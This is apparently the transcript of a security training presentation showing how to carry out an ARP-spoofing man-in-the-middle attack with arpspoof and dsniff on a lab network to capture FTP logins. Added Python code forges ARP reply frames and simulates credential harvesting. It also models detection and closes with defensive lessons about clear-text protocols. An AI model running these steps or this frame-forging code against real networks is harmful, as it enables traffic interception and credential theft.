Man In The Middle - Hacking Illustrated
DESCRIPTION
See how man-in-the-middle is performed: step by step instructions and diagrams showing how this attack works.
TRANSCRIPT
Still one of the most dangerous attacks.
While most security professionals and administrators understand MITM conceptually, few can actually execute it and prove to the layman that it is a valid and real threat. In this presentation I'll give a step-by-step walkthrough, complete with screenshots, of exactly how it's done.
How does it happen?
• When a host on an Ethernet LAN needs to send to an IP address, it broadcasts an ARP request asking "who has this IP address?"
• The request goes to everyone on the LAN, and the sender simply trusts that the only reply will come from the true holder of that IP address.
• ARP has no authentication: a host has no way to tell whether a reply came from the real owner of the address.
• Additionally, nothing in ARP says a reply must be preceded by a request. Hosts accept unsolicited replies and update their ARP cache with whatever MAC address the reply claims.
Basically, it's an attack on the ARP protocol: feed both victims forged replies and the traffic they send to each other is delivered to your MAC address instead.
The Setup!
• We'll be using two servers.
• One server will authenticate to the other via FTP.
• We'll use Backtrack and arpspoof them both.
• arpspoof makes victim 1 believe I'm victim 2 and makes victim 2 believe I'm victim 1.
• Once we've got this in place, I'll turn on IP forwarding on Backtrack, which lets me route the packets on to the intended recipient while still allowing me to "see" them.
• We'll have dsniff running as well to conveniently grab the credentials from the packets.
Communications before attack
Victim 1: IP address 192.168.2.128
Victim 2: IP address 192.168.2.138
Man in The Middle: IP address 192.168.2.135
Normal traffic flow: victim 1 and victim 2 talk to each other directly; the Backtrack box sees nothing.
Communications after attack
Victim 1: IP address 192.168.2.128
Victim 2: IP address 192.168.2.138
Man in The Middle: IP address 192.168.2.135
Desired traffic flow: everything between victim 1 and victim 2 passes through the man in the middle, which forwards it on so neither victim notices.
Step 1
Let's set up Backtrack properly first. There is a chance that after booting it you didn't get an IP address, or that your Ethernet or wireless interface wasn't enabled. We'll need to bring the interface up first, then have it get an IP address via DHCP. So let's do those things.
Backtrack ifconfig command
The eth0 interface is down, so let's bring it up:
After the up command we enter ifconfig again and see that eth0 is now up.
Now we need to tell it to get an IP address via a DHCP request.
The command is /etc/init.d/networking restart
It gets an IP address from your DHCP server. Verify it with ifconfig again. We see we have an IP address of 192.168.2.135.
Now we go to our first victim and see that its IP address is 192.168.2.128.
Victim 2 has an IP address of 192.168.2.138.
Here's the FileZilla FTP server running on victim 1.
Let's verify that the two victims can communicate. I'm issuing a continuous ping from victim 2 (.138) to victim 1 (.128).
We'll let this ping run continuously because we're going to interrupt it with our arpspoof, and that interruption is how we'll verify the spoof is working.
Now we go back to our Backtrack and open three terminal shells (you'll need all three). In the first, arpspoof victim 2 to victim 1; in other words, make victim 1 think you're victim 2 by sending it forged ARP replies that say .138 is at Backtrack's MAC address. In the second terminal, do the exact opposite: make victim 2 think you're victim 1.
Once you hit Enter in both terminal windows, the output shows arpspoof repeatedly telling victim 1 that .138 is at Backtrack's MAC address, while also telling victim 2 that .128 is at Backtrack's MAC address.
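The forged reply that arpspoof sends, and the ARP-cache behaviour the "How does it happen?" section relies on, as an added example (this is not code from the presentation or from the dsniff package): it builds the raw Ethernet/ARP frame byte for byte, feeds a legitimate reply and then the forged one to a model of victim 1's ARP cache, and runs the "same IP, different MAC" check that a monitor such as arpwatch performs. The IP addresses are the ones from the slides; the MAC addresses are made up for the example.

```python
import struct
import ipaddress

# Lab addresses. The IPs are the presentation's; the MACs are constructed
# for this example (the slides only show them inside screenshots).
VICTIM1_IP, VICTIM1_MAC = "192.168.2.128", "00:0c:29:11:11:11"
VICTIM2_IP, VICTIM2_MAC = "192.168.2.138", "00:0c:29:22:22:22"
ATTACKER_IP, ATTACKER_MAC = "192.168.2.135", "00:0c:29:aa:aa:aa"

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Forge a 42-byte Ethernet frame carrying an ARP reply that claims
    'sender_ip is at sender_mac', unicast to target_mac/target_ip.
    This is the packet arpspoof emits, unsolicited, every couple of seconds."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=Ethernet(1), ptype=IPv4(0x0800), hlen=6, plen=4, opcode=reply
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ipaddress.IPv4Address(sender_ip).packed
    arp += mac_bytes(target_mac) + ipaddress.IPv4Address(target_ip).packed
    return eth + arp


def parse_arp(frame):
    """Decode an Ethernet/ARP frame; returns None for anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": str(ipaddress.IPv4Address(frame[28:32])),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": str(ipaddress.IPv4Address(frame[38:42])),
    }


class NaiveArpCache:
    """Models the behaviour the attack depends on: the host overwrites its
    cache entry from any ARP reply it receives, solicited or not."""

    def __init__(self):
        self.table = {}

    def receive(self, frame):
        pkt = parse_arp(frame)
        if pkt and pkt["op"] == ARP_REPLY:
            self.table[pkt["sender_ip"]] = pkt["sender_mac"]

    def lookup(self, ip):
        return self.table.get(ip)


def detect_flips(frames):
    """What arpwatch-style monitoring does: remember the first MAC seen for
    each IP and report any later reply that claims a different one."""
    seen, alerts = {}, []
    for frame in frames:
        pkt = parse_arp(frame)
        if not pkt or pkt["op"] != ARP_REPLY:
            continue
        ip, mac = pkt["sender_ip"], pkt["sender_mac"]
        if ip in seen and seen[ip] != mac:
            alerts.append((ip, seen[ip], mac))
        seen.setdefault(ip, mac)
    return alerts


def poisoning_demo():
    """Replay the slides' first arpspoof against a model of victim 1's cache:
    returns (MAC for .138 before, MAC for .138 after, monitor alerts)."""
    victim1 = NaiveArpCache()
    legit = build_arp_reply(VICTIM2_MAC, VICTIM2_IP, VICTIM1_MAC, VICTIM1_IP)
    forged = build_arp_reply(ATTACKER_MAC, VICTIM2_IP, VICTIM1_MAC, VICTIM1_IP)
    victim1.receive(legit)
    before = victim1.lookup(VICTIM2_IP)
    victim1.receive(forged)   # one unsolicited reply is enough
    after = victim1.lookup(VICTIM2_IP)
    return before, after, detect_flips([legit, forged])
```

Putting the forged frame on the wire needs a raw socket (root) and, as arpspoof does, re-sending it every few seconds so the cache entry never ages back out. The second arpspoof terminal is the same frame with the roles swapped (sender .128, target victim 2). On the defensive side, the flip check above is exactly what gives the attack away: static ARP entries on the two hosts, Dynamic ARP Inspection on the switch, or an arpwatch-style monitor all break or expose this step.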
We verify that the spoof is working by checking whether the pings we started earlier on victim 2 are now failing. They should be: victim 2 is now sending its echo requests to Backtrack's MAC address, and Backtrack isn't forwarding anything yet, so the packets never reach victim 1.
We have now successfully diverted both victims' traffic to our Backtrack. Next we need to enable IP forwarding (the kernel's net.ipv4.ip_forward setting) so the diverted traffic is routed on to its intended destination instead of being dropped.
Once we've enabled IP forwarding, go back to victim 2 and check the ping: the replies come back again. Congrats! You're now man-in-the-middling. But we still need to grab credentials, and that takes another tool.
To grab authentication credentials, we'll start up dsniff in the third terminal.
Now go to victim 2 and stop your pings. Then FTP to the FTP server running on victim 1.
Next, log in with whatever credentials you've set up on it.
Once you've successfully logged in, you should see whatever files you have in your FTP store.
Here's the important part. dsniff needs to see the entire session before it reports the credentials, and "entire session" includes the disconnect or log-off. So you have to end the session before the credentials are actually displayed. Close your FTP session, then go back to your Backtrack terminal and you'll see the login information. Feeling l33t yet?
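What dsniff is doing with the FTP control connection at this point, as an added example (not the presentation's code and not dsniff's own source): client-to-server bytes are buffered per connection and only decoded when the connection closes, which is why the credentials appear only after you log off. The two sessions in the demo are constructed; the user names and passwords are invented, and the addresses are the slides' victim 2 (client) and victim 1 (server).

```python
import re
from dataclasses import dataclass

# Addresses from the presentation; the credentials below are constructed for
# this example, the slides never show the real ones.
VICTIM1 = "192.168.2.128"   # FileZilla FTP server
VICTIM2 = "192.168.2.138"   # FTP client

CRED_RE = re.compile(r"^(USER|PASS) (.*)$")


def extract_ftp_credentials(control_stream):
    """Pair every USER command with the PASS that follows it in a
    client->server FTP control stream. The whole remainder of the line is
    the argument, so passwords containing spaces survive intact."""
    creds, user = [], None
    for line in control_stream.split("\r\n"):
        m = CRED_RE.match(line)
        if not m:
            continue
        cmd, arg = m.groups()
        if cmd == "USER":
            user = arg
        elif user is not None:        # a PASS with no preceding USER is ignored
            creds.append((user, arg))
            user = None
    return creds


@dataclass
class _Stream:
    data: bytes = b""


class FtpCredentialSniffer:
    """Stand-in for dsniff's handling of a port-21 connection: payload is
    buffered per (client, server) pair and decoded only at connection close,
    so nothing is reported while the session is still open."""

    def __init__(self):
        self.streams = {}
        self.harvested = []

    def data(self, client, server, payload):
        """One TCP segment's worth of client->server payload."""
        self.streams.setdefault((client, server), _Stream()).data += payload

    def close(self, client, server):
        """Connection teardown (FIN/RST): decode the buffered stream."""
        stream = self.streams.pop((client, server), None)
        if stream is None:
            return []
        creds = extract_ftp_credentials(stream.data.decode("latin-1", "replace"))
        self.harvested.extend((client, server, u, p) for u, p in creds)
        return creds


def replay_demo():
    """Two constructed logins from victim 2 to victim 1: a 5-character
    password and a 21-character complex one. Both cross the wire in clear
    text and are harvested identically; only the timing of the report
    (at close) differs from what a newcomer expects."""
    sniffer = FtpCredentialSniffer()
    # Session 1, segment by segment
    for chunk in (b"USER bob\r\n", b"PASS abcde\r\n", b"SYST\r\n", b"PWD\r\n"):
        sniffer.data(VICTIM2, VICTIM1, chunk)
    seen_before_close = list(sniffer.harvested)      # still empty
    sniffer.data(VICTIM2, VICTIM1, b"QUIT\r\n")
    first = sniffer.close(VICTIM2, VICTIM1)
    # Session 2: long complex password, split across two TCP segments
    sniffer.data(VICTIM2, VICTIM1, b"USER alice\r\nPASS Xk9#mQ2")
    sniffer.data(VICTIM2, VICTIM1, b"!vL7$pR4&wZ1*n\r\nQUIT\r\n")
    second = sniffer.close(VICTIM2, VICTIM1)
    return seen_before_close, first, second
```

Reassembling the stream before matching (rather than matching segment by segment) is what makes the split PASS line in the second session come out whole; it is also why an abandoned session that is never closed yields nothing until it times out. Password length and complexity never enter into it.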
Lessons
It is a classic mistake for laymen, and sometimes even security professionals, to think that the answer is always strong passwords. In a man-in-the-middle attack against a clear-text protocol like FTP, a strong 20-character complex password with numbers, letters, and special characters is obtained just as easily and quickly as a 5-character, letters-only password: the password crosses the wire in the clear either way.
Join us in one of our Ethical Hacking classes where I or another of our world class instructors will teach you how to perform man in the middle against encrypted protocols such as SSL.
Thanks for watching! Keatron Evans
Closing
THIS PRESENTATION ALSO AVAILABLE ON Resources.InfosecInstitute.com